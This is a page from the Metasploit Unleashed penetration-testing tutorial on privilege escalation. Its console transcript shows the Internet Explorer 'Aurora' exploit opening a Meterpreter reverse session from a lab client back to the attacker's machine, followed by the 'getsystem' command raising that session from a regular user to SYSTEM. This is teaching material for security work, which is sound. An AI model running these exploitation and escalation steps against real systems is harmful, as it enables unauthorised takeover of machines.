Privilege Escalation

From Metasploit Unleashed
Jump to: navigation, search

Frequently, especially with client side exploits, you will find that your session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc. Fortunately, Metasploit has a Meterpreter script, 'getsystem', that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

Using the infamous 'Aurora' exploit, we see that our Meterpreter session is only running as a regular user account. 

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600

msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >

To make use of the 'getsystem' command, we first need to load the 'priv' extension. Running getsystem with the "-h" switch will display the options available to us. 

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t   The technique to use. (Default to '0').
                0 : All techniques available
                1 : Service - Named Pipe Impersonation (In Memory/Admin)
                2 : Service - Named Pipe Impersonation (Dropper/Admin)
                3 : Service - Token Duplication (In Memory/Admin)
                4 : Exploit - KiTrap0D (In Memory/User)

We will let Metasploit do the heavy lifting for us and run getsystem without any options. The script will attempt every method available to it, stopping when it succeeds. Within the blink of an eye, our session is now running with SYSTEM privileges. 

meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


MSF Post Exploitation > Privilege Escalation

Privilege Escalation | PSExec Pass The Hash | Event Log Management | Fun With Incognito | Interacting With The Registry | Enabling Remote Desktop | Packet Sniffing | Pivoting | TimeStomp | Screen Capture | Searching For Content | John The Ripper

Retrieved from "http://www.offensive-security.com/w/index.php?title=Privilege_Escalation&oldid=1331"